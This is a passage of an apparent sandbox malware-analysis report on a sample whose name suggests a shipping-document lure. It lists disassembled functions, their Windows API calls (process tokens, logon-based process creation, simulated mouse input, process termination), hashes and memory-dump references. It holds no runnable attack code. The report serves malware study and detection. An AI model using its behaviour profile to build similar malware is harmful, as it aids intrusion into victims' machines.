                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Menu$Item$CountMessagePostString
                                                                • String ID:
                                                                • API String ID: 650687236-0
                                                                • Opcode ID: e70bb42db54ab11cb5ccfa0fc4677881da0a9e1746f2a9cb64d243d40e35d54c
                                                                • Instruction ID: 8c749ac6c82633053de88fae41674ff648c92a378ff5145a81bc6b692a0663ef
                                                                • Opcode Fuzzy Hash: e70bb42db54ab11cb5ccfa0fc4677881da0a9e1746f2a9cb64d243d40e35d54c
                                                                • Instruction Fuzzy Hash: F2515835A00615AFCF11EF64C945AAEBBB4EF88320F114469E916AB351CB74AE418B90
                                                                Function 0098EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 0098EF06
                                                                • VariantClear.OLEAUT32(00000013), ref: 0098EF78
                                                                • VariantClear.OLEAUT32(00000000), ref: 0098EFD3
                                                                • _memmove.LIBCMT ref: 0098EFFD
                                                                • VariantClear.OLEAUT32(?), ref: 0098F04A
                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0098F078
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                                • String ID:
                                                                • API String ID: 1101466143-0
                                                                • Opcode ID: a3691f500f7ab939f98f1269243fdcea6253cfb692506bf66c175c3a8e579b6b
                                                                • Instruction ID: 2d89e7ba7604f22420f9f9b60b473fdf77057385933f6e08f6d05ef0362752d8
                                                                • Opcode Fuzzy Hash: a3691f500f7ab939f98f1269243fdcea6253cfb692506bf66c175c3a8e579b6b
                                                                • Instruction Fuzzy Hash: 305168B5A00209EFCB14DF58C894AAAB7B9FF4C314B15856AED59DB301E334E911CFA0
                                                                Function 0099220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00992258
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009922A3
                                                                • IsMenu.USER32(00000000), ref: 009922C3
                                                                • CreatePopupMenu.USER32 ref: 009922F7
                                                                • GetMenuItemCount.USER32(000000FF), ref: 00992355
                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00992386
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                • String ID:
                                                                • API String ID: 3311875123-0
                                                                • Opcode ID: 9167a791557af6ac6dc4c709da622348c5b6b209ef1bfb73f765f60798eb77a9
                                                                • Instruction ID: 506f705438e9e13133b8baf95a41bd5bf56beebc79d7e7d7f5fb6b6ba229989d
                                                                • Opcode Fuzzy Hash: 9167a791557af6ac6dc4c709da622348c5b6b209ef1bfb73f765f60798eb77a9
                                                                • Instruction Fuzzy Hash: 9E51CF3060420AFFDF21CF6CD989BADBBF9BF45714F204629E811A7290E3799944CB61
                                                                Function 00931765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 0093179A
                                                                • GetWindowRect.USER32(?,?), ref: 009317FE
                                                                • ScreenToClient.USER32(?,?), ref: 0093181B
                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0093182C
                                                                • EndPaint.USER32(?,?), ref: 00931876
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                • String ID:
                                                                • API String ID: 1827037458-0
                                                                • Opcode ID: 951ace4a56af74d5858c71b7ca0f66c168eb2e87849371d6f5d10bb3432dc1e8
                                                                • Instruction ID: 10c42d4007e5768b4d03a04d84198308df4faff9c5c31ed160fd3ac6eb292c4e
                                                                • Opcode Fuzzy Hash: 951ace4a56af74d5858c71b7ca0f66c168eb2e87849371d6f5d10bb3432dc1e8
                                                                • Instruction Fuzzy Hash: 7041AB31508700AFD710DF28CC84FBA7BE8EB49724F044629FAA58B2B1D7309845EB62
                                                                Function 009BB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShowWindow.USER32(009F57B0,00000000,00E85388,?,?,009F57B0,?,009BB5A8,?,?), ref: 009BB712
                                                                • EnableWindow.USER32(00000000,00000000), ref: 009BB736
                                                                • ShowWindow.USER32(009F57B0,00000000,00E85388,?,?,009F57B0,?,009BB5A8,?,?), ref: 009BB796
                                                                • ShowWindow.USER32(00000000,00000004,?,009BB5A8,?,?), ref: 009BB7A8
                                                                • EnableWindow.USER32(00000000,00000001), ref: 009BB7CC
                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 009BB7EF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Show$Enable$MessageSend
                                                                • String ID:
                                                                • API String ID: 642888154-0
                                                                • Opcode ID: a84cf66461f54a2a430bb559a8b04589752f478b97c5ebcf915adfb3700361c8
                                                                • Instruction ID: 0f1242a552ce75dc9c969401e1e62306713198c9ccc21ae13d3061c5fa68d06b
                                                                • Opcode Fuzzy Hash: a84cf66461f54a2a430bb559a8b04589752f478b97c5ebcf915adfb3700361c8
                                                                • Instruction Fuzzy Hash: 13416074604244AFDB21CF24CAD9BD47BE5FB45320F1841B9E9488FAA2CBB1A956CB50
                                                                Function 009A709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,009A4E41,?,?,00000000,00000001), ref: 009A70AC
                                                                  • Part of subcall function 009A39A0: GetWindowRect.USER32(?,?), ref: 009A39B3
                                                                • GetDesktopWindow.USER32 ref: 009A70D6
                                                                • GetWindowRect.USER32(00000000), ref: 009A70DD
                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 009A710F
                                                                  • Part of subcall function 00995244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009952BC
                                                                • GetCursorPos.USER32(?), ref: 009A713B
                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009A7199
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                • String ID:
                                                                • API String ID: 4137160315-0
                                                                • Opcode ID: a89832f12dd3e63cae2b438b4d4b560f07a88d185dabed97333ee89c10e382b2
                                                                • Instruction ID: 58689ed308efb85661825fd042c72c67d1f9e06a9301a66b6571f9a1d56b34f1
                                                                • Opcode Fuzzy Hash: a89832f12dd3e63cae2b438b4d4b560f07a88d185dabed97333ee89c10e382b2
                                                                • Instruction Fuzzy Hash: BA31AF72509305ABD720DF54CC49B9BBBEAFB89314F000A29F59997191CA70EA09CBD2
                                                                Function 00988879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 009880A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009880C0
                                                                  • Part of subcall function 009880A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009880CA
                                                                  • Part of subcall function 009880A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009880D9
                                                                  • Part of subcall function 009880A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009880E0
                                                                  • Part of subcall function 009880A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009880F6
                                                                • GetLengthSid.ADVAPI32(?,00000000,0098842F), ref: 009888CA
                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009888D6
                                                                • HeapAlloc.KERNEL32(00000000), ref: 009888DD
                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 009888F6
                                                                • GetProcessHeap.KERNEL32(00000000,00000000,0098842F), ref: 0098890A
                                                                • HeapFree.KERNEL32(00000000), ref: 00988911
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                • String ID:
                                                                • API String ID: 3008561057-0
                                                                • Opcode ID: 8c05a8b97be4499dfb5448f188b8d109b12f07ca9bd50ce653de2d84af54225d
                                                                • Instruction ID: e0036f178448bb82163181e7eb59e0bc8b8a27423ad6b033089f8f958e04f753
                                                                • Opcode Fuzzy Hash: 8c05a8b97be4499dfb5448f188b8d109b12f07ca9bd50ce653de2d84af54225d
                                                                • Instruction Fuzzy Hash: 7211AF71525209FFDB10AFA8DD19BBF776DEB44321F904528E845D7210CB369D00DB60
                                                                Function 009885B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009885E2
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 009885E9
                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009885F8
                                                                • CloseHandle.KERNEL32(00000004), ref: 00988603
                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00988632
                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00988646
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                • String ID:
                                                                • API String ID: 1413079979-0
                                                                • Opcode ID: 558eaa0b2700e8150d0bd41c6bc634bfb02e1d51ad37f55f4d330e58f0f2e2a6
                                                                • Instruction ID: 8e4e9fc479697fad69a07c25d84935b864895ce0f8e7c9408f44251d272dcce6
                                                                • Opcode Fuzzy Hash: 558eaa0b2700e8150d0bd41c6bc634bfb02e1d51ad37f55f4d330e58f0f2e2a6
                                                                • Instruction Fuzzy Hash: 6A11597250420DABDF019FA8DD49BEF7BA9EF08354F044164FE04A2260C7768D60EB60
                                                                Function 0098B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 0098B7B5
                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0098B7C6
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0098B7CD
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0098B7D5
                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0098B7EC
                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0098B7FE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CapsDevice$Release
                                                                • String ID:
                                                                • API String ID: 1035833867-0
                                                                • Opcode ID: 2f0c36633fb52330e2ee8edc88cec7b95639594ff191437a56abe76b93e5b6b6
                                                                • Instruction ID: 7d4c9281d705327f714571b255e6d2349ac1310c1a2ace2e7af5681add7072ef
                                                                • Opcode Fuzzy Hash: 2f0c36633fb52330e2ee8edc88cec7b95639594ff191437a56abe76b93e5b6b6
                                                                • Instruction Fuzzy Hash: C4017175A04309BBEF10ABE69D45F5EBFA8EB48321F044165FE04A7291D6309C00CF90
                                                                Function 00950162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00950193
                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 0095019B
                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009501A6
                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009501B1
                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 009501B9
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 009501C1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Virtual
                                                                • String ID:
                                                                • API String ID: 4278518827-0
                                                                • Opcode ID: 8361c506def4fcd662fcbaecd4fcfb58f970e75e250c4514ca0d069c577f0f55
                                                                • Instruction ID: eb7d21216534ce6b27a10a0d4d969e34e614282ebb7c5df053d54d7b04809558
                                                                • Opcode Fuzzy Hash: 8361c506def4fcd662fcbaecd4fcfb58f970e75e250c4514ca0d069c577f0f55
                                                                • Instruction Fuzzy Hash: A8016CB0901759BDE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                Function 009953E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009953F9
                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0099540F
                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0099541E
                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0099542D
                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00995437
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0099543E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                • String ID:
                                                                • API String ID: 839392675-0
                                                                • Opcode ID: a43078f3e694e1fc27bac836fa1a19051559bf964ef298ddcb32a46eec8a5700
                                                                • Instruction ID: b95d890d7a7c44495b51b78645152bb22b1c35d4357fc690f348f418ddae15b4
                                                                • Opcode Fuzzy Hash: a43078f3e694e1fc27bac836fa1a19051559bf964ef298ddcb32a46eec8a5700
                                                                • Instruction Fuzzy Hash: 8CF09032658558FBE7215BA6DD0DEEF7B7CEFCAB21F000269FA04D1060D7A01A0197B5
                                                                Function 00997230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00997243
                                                                • EnterCriticalSection.KERNEL32(?,?,00940EE4,?,?), ref: 00997254
                                                                • TerminateThread.KERNEL32(00000000,000001F6,?,00940EE4,?,?), ref: 00997261
                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00940EE4,?,?), ref: 0099726E
                                                                  • Part of subcall function 00996C35: CloseHandle.KERNEL32(00000000,?,0099727B,?,00940EE4,?,?), ref: 00996C3F
                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00997281
                                                                • LeaveCriticalSection.KERNEL32(?,?,00940EE4,?,?), ref: 00997288
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                • String ID:
                                                                • API String ID: 3495660284-0
                                                                • Opcode ID: c87ef416ec47efcabe09abdd23187ec4bd52d8330dbf0547055fe9a2e2d20e35
                                                                • Instruction ID: a1d68a7b43ecb6bdd7ee1196e5f0c1039ff1781817a1e040c03f369274addf27
                                                                • Opcode Fuzzy Hash: c87ef416ec47efcabe09abdd23187ec4bd52d8330dbf0547055fe9a2e2d20e35
                                                                • Instruction Fuzzy Hash: 8AF05E36568612EBEB121B68EE5CADA7729EF45722B100631F613950A0DB765801DB60
                                                                Function 00988992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0098899D
                                                                • UnloadUserProfile.USERENV(?,?), ref: 009889A9
                                                                • CloseHandle.KERNEL32(?), ref: 009889B2
                                                                • CloseHandle.KERNEL32(?), ref: 009889BA
                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009889C3
                                                                • HeapFree.KERNEL32(00000000), ref: 009889CA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                • String ID:
                                                                • API String ID: 146765662-0
                                                                • Opcode ID: 3588ec3162bafa1f372d1712880eb8bd645f2bd19043f4ca62e1f264e748774b
                                                                • Instruction ID: d90d7f4395dec1be76e2780bd80250268511ca974abe4f53e3ab2d149e5ab60d
                                                                • Opcode Fuzzy Hash: 3588ec3162bafa1f372d1712880eb8bd645f2bd19043f4ca62e1f264e748774b
                                                                • Instruction Fuzzy Hash: 15E0C276018401FBDA011FE5EE1C90ABBA9FB89372B148730F21981070CB329420EB50
                                                                Function 009A85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 009A8613
                                                                • CharUpperBuffW.USER32(?,?), ref: 009A8722
                                                                • VariantClear.OLEAUT32(?), ref: 009A889A
                                                                  • Part of subcall function 00997562: VariantInit.OLEAUT32(00000000), ref: 009975A2
                                                                  • Part of subcall function 00997562: VariantCopy.OLEAUT32(00000000,?), ref: 009975AB
                                                                  • Part of subcall function 00997562: VariantClear.OLEAUT32(00000000), ref: 009975B7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                • API String ID: 4237274167-1221869570
                                                                • Opcode ID: ba430d7d577dda02efcb0a14af51e34e08e19e82270631c544417b4fd12a5ca2
                                                                • Instruction ID: 40928e2387452d24479634030a2f59bdc9da91ff166c542bb4fa0f2ddd0bbadb
                                                                • Opcode Fuzzy Hash: ba430d7d577dda02efcb0a14af51e34e08e19e82270631c544417b4fd12a5ca2
                                                                • Instruction Fuzzy Hash: 95915C756083019FCB10DF28C485A5BBBE8EFCA714F14496DF89A9B361DB31E905CB92
                                                                Function 00992A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0094FC86: _wcscpy.LIBCMT ref: 0094FCA9
                                                                • _memset.LIBCMT ref: 00992B87
                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00992BB6
                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00992C69
                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00992C97
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
